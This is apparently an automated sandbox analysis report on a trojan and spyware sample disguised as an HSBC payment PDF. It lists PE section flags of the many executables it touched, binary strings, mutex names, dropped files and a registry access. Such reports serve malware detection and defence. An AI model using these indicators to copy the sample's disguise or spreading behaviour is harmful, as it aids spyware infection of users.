Source: AutoIt3_x64.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: snmptrap.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Spectrum.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssh-agent.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: TieringEngineService.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AgentService.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vds.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: VSSVC.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WmiApSrv.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wmpnetwk.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SearchIndexer.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe0.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe0.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdate.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateBroker.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateCore.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateOnDemand.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe0.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msiexec.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PerceptionSimulationService.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: perfhost.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Locator.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SensorDataService.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.2.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.2.dr | Binary string: base\stor\blb\catalog\compare.cpprowid1 != rowid2pKey->m_type == pCol->m_typepRow1 > pRow2_hImpersonationToken != INVALID_HANDLE_VALUEbase\stor\blb\blbimg\blbimg.cxxReadHandle != INVALID_HANDLE_VALUEWriteHandle != INVALID_HANDLE_VALUEpdwFlagsFveGetStatusWwszDeviceName%ws\%wsuCurrentBit < HintSpaceBitmapSizeExtentLength > 0pCurrentListEntry->Length > 0pbRecomputeNeededpBadClusExtentsBeforeRecovery\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy{\System Volume Information\*{3808876B-C176-4e48-B7AE-04046E6CC752}\System Volume Information\{{3808876B-C176-4e48-B7AE-04046E6CC752}ReplicationContext->FirstBlock != NULLIoState[CurrentBuffer] == BLBIMGI_IO_STATE_WRITINGBackupFileName != NULLReplicationHandleReplicationContext != NULLoffset[i] < volumeSizet.QuadPart < restoreContext->VolumeSizereadBuffer != NULL\pagefile.sys\hiberfil.sys!IsListEmpty(&diffsInSource)
Source: wbengine.exe.2.dr | Binary string: base\stor\blb\engine\blbengutils\Blbvhdhelper.hthis->m_handle == NULL\\?\Globalroot\Device\Harddisk%lu\Partition1\\?\Globalroot\Device\Harddisk%lu\Partition2\\?\Globalroot\Device\HarddiskVolume%luChild_{47b7fa87-ce42-48ff-8b18-2f1088121503}WindowsBackupLinksbase\stor\blb\engine\blbengutils\blbvhdhelper.cppwszVhdFile && *wszVhdFilepwszVolumeDevicePathwszDiskPath && *wszDiskPathpwszVolumePathwszMountedDeviceName && *wszMountedDeviceNamepCBlbVhdwszMountedVolumePathNoSlash && *wszMountedVolumePathNoSlashpVhdContextpVhdContextForRemovalwszVolumeDevicePath && *wszVolumeDevicePathppVhdContextpVhdContext->m_pCBlbVhdsdiVersion == STORAGE_DEPENDENCY_INFO_VERSION_1 || sdiVersion == STORAGE_DEPENDENCY_INFO_VERSION_2ppDependencyInfopbIsVolVirtualppStorageDepInfowszTargetVolName && *wszTargetVolNamewszVirtualSrcVolName && *wszVirtualSrcVolNamepbIsVirtualSrcVolDependantpVolumeVHDInfo != NULLpstDepInfo != NULLpstDepInfoType2MaxAncestor != NULLpwszDiffVhdFilePath && pwszVhdTempPath%ws_%ws_%wspProgressReportCallbackContextwszVHDVolumeDevicePathpbCompactionRequiredwszVhdFilepGuidSnapshotIdwszVHDVolumeDevicePath && *wszVHDVolumeDevicePathpdwVHDDeviceDiskNumberpVhdHandle
Source: wbengine.exe.2.dr | Binary string: _((HANDLE)(LONG_PTR)-1) != hFilebase\stor\blb\dsm\dsmutils\dll\fsutilswrapper.cppExtractVolumePath(ssPath, ssVolumePath)SplitDirPath( ssDirPath, ssParentDir, ssDirName )GetParentPaths(ssPath, arrstrPaths)ssDirPath.Length() != 0base\stor\blb\dsm\dsmutils\dll\fsutils.cpppstrPath != 0pstrName != 0CLOCK$COMLPTCONPRNAUXNUL\\?\GLOBALROOT\Device\base\stor\blb\dsm\dsmutils\dll\fsutils.cppInvalid path:%lsssPath.Length() > 0GetVolumePrefixLength failed for %lsFailed to parse path:%lsExtractVolumePath(ssWorkingPath, ssVolumePath)ssWorkingPath[ssWorkingPath.Length() - 1] == L'\\'(((HRESULT)(hrReason)) < 0)pstrPath && pstrPath[0]pfIsReparsedppstrReparsePtPath && (*ppstrReparsePtPath == 0)GetFileAttributes() failed on:%lsIsPathMountPoint(ssPath.PeekStr(), &fMountPoint)pszVolumePath != 0phVolume != 0ssVolumePath[ssVolumePath.Length() - 1] == L'\\'Failed to open volume:%ls((HANDLE)(LONG_PTR)-1) == hVolumeppstrPath && *ppstrPath == 0dwPathLength > 0 && pstrFilePath[dwPathLength-1] == L'\\'0 != pdwFileAttributesGetFileInformationByHandle(hFile, &fileInfo)0 != lpstrFilePathCreateFile unsuccessful for %wsFSWrapperGetFileAttributes(hFile, pdwFileAttributes)0 != pFileAttributesGetFileInformationByHandleEx(hFile, FileBasicInfo, &fileInfo, sizeof(FILE_BASIC_INFO))GetFileSize failed for %ws((DWORD)-1) != dwFileAttributesGetFileInformationByHandleEx failedSetFileInformationByHandle failedFSWrapperSetFileAttributes(hFile, dwFileAttributes)SplitDirPath(strPath, strParent, strChild)Path %S is invalid as it contains a '.' or '..', hr=0x%08xHRESULT_FROM_WIN32(GetLastError())wszPath && wszPath[0]pfIsPathMountPoint
Source: wbengine.exe.2.dr | Binary string: base\stor\blb\engine\blbengutils\blbvolumeutils.cpppbFloppypguidVolumeId != NULLpbIsCritical != NULLpguidVolumeIdwszMountedDeviceNamewszVolumeGuidpwszReparsePointName\\?\GLOBALROOT\DEVICE\HARDDISKVOLUME%dWsbMountedVolumeFile%lu_%spVolumeCatrgVolumeLocalwszVolumeGuidPathpwszVolumeGlobalRootPathVolume%ws\\?\GLOBALROOT%wspdwlJournalIdplastUsnwszVolumeName && *wszVolumeNamepbPerformResizepdwlUsnSizevssSnapshotId != GUID_NULLdwlJournalId != BLB_INVALID_USN_JOURNAL_IDusnBeforeSnapShot != BLB_INVALID_USN_IDwszBackupSetDirectorypwszVhdPathwszVolumeName != NULLpbIsVolumeOnSharedDisk != NULLpbIsCSVpdwVolumeNumber6
Source: classification engine | Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@20/155@22/12
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Users\user\AppData\Roaming\aed9f0dd1e9bf5c4.bin
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-aed9f0dd1e9bf5c4-inf
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-aed9f0dd1e9bf5c473779169-b
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-aed9f0dd1e9bf5c49ea72c54-b
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: C:\Users\user\AppData\Local\Temp\autC5C5.tmp
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
